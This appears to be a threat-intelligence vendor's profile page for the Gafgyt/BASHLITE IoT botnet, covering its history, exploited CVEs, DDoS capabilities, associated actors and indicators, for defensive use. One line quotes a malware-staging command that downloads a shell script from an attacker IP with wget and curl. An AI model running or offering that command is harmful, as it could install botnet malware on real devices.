Gafgyt, also known as BASHLITE, is a Linux-based botnet malware family first observed in 2014. It primarily compromises routers, surveillance equipment, and other embedded Internet-of-Things devices to conduct distributed denial-of-service attacks. Its source code leaked in 2015, enabling widespread reuse and the development of numerous variants and derivative botnets.
Gafgyt spreads through scanning, Telnet credential brute forcing, and exploitation of remote-code-execution and command-injection vulnerabilities. Early iterations exploited Shellshock, while later variants incorporated exploits against router firmware, surveillance devices, the WeMo UPnP API, and web application frameworks. Infection chains use shell staging scripts and architecture-specific droppers or binaries to execute compatible payloads across different embedded Linux systems. Infected devices communicate with command-and-control infrastructure and receive instructions to scan for additional victims or attack designated targets.
Its attack capabilities vary by variant and include TCP and UDP floods, acknowledgment floods, amplification attacks, connection-holding attacks, and routines intended to bypass DDoS mitigation services. Some variants can launch multiple attack methods simultaneously, terminate specified processes, and download and execute additional payloads, including cryptocurrency miners and device-bricking malware. Obfuscation includes XOR-encoded payloads, while the Gafgyt_tor variant conceals command-and-control communications through Tor and encrypts sensitive strings.
Gafgyt has been used and adapted by multiple operators. Keksec has repeatedly reused its source code, including in Gafgyt_tor and EnemyBot. Named Gafgyt variants include Hakai and Hoaxcalls. The family primarily targets exposed, weakly authenticated, or unpatched devices rather than a particular industry.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2016-6277 – Netgear RCE via shell metacharacters in the path info to cgi-bin/
In its previous iterations, Bashlite exploited Shellshock to gain a foothold into the vulnerable devices.
CVE-2018-10561/ CVE-2018-10562 exploit from sample [9]
The most used exploit was an old one from 2017. The vulnerability, CVE-2017-17215, can be found in specific Huawei routers.
The miniigd SOAP service allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.
CVE-2015-2051 – HNAP SOAPAction-Header Command Execution
A prime example is CVE-2023-1389, a command injection affecting TP-Link Archer AX21 routers, which is part of CISA KEV since 2023 and has been exploited by botnets such as AGoent, Gafgyt, Moobot, Mirai and others.
During routine sandbox hunting analysis, the Uptycs Threat Research team uncovered evidence of an ongoing live campaign exploiting the Log4j vulnerability, which commenced in January 2024.
“Ubiquiti published security advisory SAB-064 on 21 May 2026 addressing CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910. Each vulnerability was assigned a CVSS score of 10.0 and, when chained, could allow an unauthenticated remote attacker to obtain root-level access to affected UniFi systems.”
“A URL that starts with the public prefix /api/auth/validate-sso/ but contains encoded ../ sequences passes the gateway's public check, then decodes into a protected /proxy/<service>/… path and reaches the backend with no authentication.”
CVE-2018-10561 / CVE-2018-10562 — GPON Routers Authentication Bypass and Command Injection vulnerabilities
“That mismatch is CVE-2026-34908 (broken access control) and CVE-2026-34909 (path traversal), the pair Ubiquiti describes in SAB-064.”
Attackers exploit CVE-2021-27137 in vulnerable DD-WRT routers by sending specially crafted SSDP M-SEARCH requests to UDP port 1900. Successful exploitation results in remote code execution and malware deployment.
At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older). | The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
On June 2, 2022, Volexity performed a coordinated disclosure of an under-exploit zero day in Atlassian Confluence, CVE-2022-26134. Since the original disclosure and subsequent publication of various proofs of concept, Barracuda researchers have discovered a large number of attempts to exploit this vulnerability. | First, let’s look at one attempt to deliver the Gafgyt DDoS botnet malware... The attacker is essentially attempting to create a botnet member on any system that can be infected.
Attackers exploit a Langflow remote code execution flaw to drop a stripped-down DDoS payload... the code validation endpoint executes untrusted Python “without proper sandboxing.”... CISA added CVE-2025-3248 to its KEV catalog in May 2025, and GreyNoise has tracked hundreds of exploit source IPs. | Akamai found a new Gafgyt botnet campaign that hijacks AI infrastructure. Attackers exploit a Langflow remote code execution flaw to drop a stripped-down DDoS payload.
Indicators of Compromise (IoCs):- Type Indicator Description CVE CVE-2016-15047 Avtech DVR Camera authentication bypass and command execution exploit
Indicators of Compromise (IoCs):- Type Indicator Description CVE CVE-2025-34054 Avtech DVR Camera authentication bypass and command execution exploit
C0XMO’s success depends on known, unpatched vulnerabilities that have had available fixes for some time. CVE-2021-27137 in DD-WRT, CVE-2015-2051 in D-Link devices, CVE-2022-35914 in GLPI project software, and multiple Avtech DVR camera flaws are all part of its exploit toolkit.
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Keksec frequently used Gafgyt source code, which was leaked in 2015 and had infected approximately one million devices by 2016.
Gafgyt_tor share the same origin with the Gafgyt samples described by the keksec group, the core function is still DDoS attacks and scanning.
The original Mirai was consistently tweaked to compete with its “DDoS-as-a-Service” provider rival vDOS and their Gafgyt botnet.
BASHLITE (also known as Gafgyt, Lizkebab, PinkSlip, Qbot, Torlus and LizardStresser) is malware which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS).
28 distinct techniques documented for this family, organized by ATT&CK tactic.
We can see that Keksec launched scans and attacks on targets across the network almost non-stop. Our honeypots see new variants and exploits all the time, with the exception of some occasional breaks. When a new exploit is introduced, the scans increase significantly.
The malware creates cron jobs that execute every 15 minutes... to ensure execution after system reboots.
An attacker can then remotely issue commands ... and download other files to the compromised devices.
Most of the Gafgyt and Tsunami samples we captured were not packed... String encoding... Necro also cryptographically protects the string by first performing character substitution and then doing zip compression.
A very traditional technique on Linux systems is to use random strings to override argv parameters and prctl(PR_SET_NAME,buf) to change the process name and start parameters in order to disguise the process.
Packet sniffing is one of the more favoured features of Keksec, and the code can be seen in all three families. The basic function is to capture TCP traffic after filtering out some specified ports and IPs, and to send the remaining data to the C2.
Packet sniffing is one of the more favoured features of Keksec, and the code can be seen in all three families. The basic function is to capture TCP traffic after filtering out some specified ports and IPs, and to send the remaining data to the C2.
After persistence is established, C0XMO connects to its command-and-control infrastructure and performs a custom multi-stage handshake.
We found Tor proxy being used to communicate with the C2 in both Gafgyt and Necro.
In Gafgyt Tor proxy is used to talk to the C2 through a built-in proxy list. Up to 173 proxy IPs can be used for a single sample.
wget http://200.150.205.65/8UsA.sh; curl -O http://200.150.205.65/8UsA.sh
575 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
112 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
IoT DDoS botnet family that predates Mirai. The article describes continuing activity through variants and recruitment approaches associated with weak IoT credentials.
Identified as the codebase underlying historical Rebirth/Vulcan samples. Recent Rebirth variants also resemble documented Gafgyt samples, including use of the prctl system call to disguise their process names as /bin/bash.
Mentionné uniquement comme botnet concurrent dont les processus sont supprimés par Masjesu.
A MIPS-based IoT malware family included as one of seven balanced malware-family classes in the proof-of-concept EMBeD benchmark dataset.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.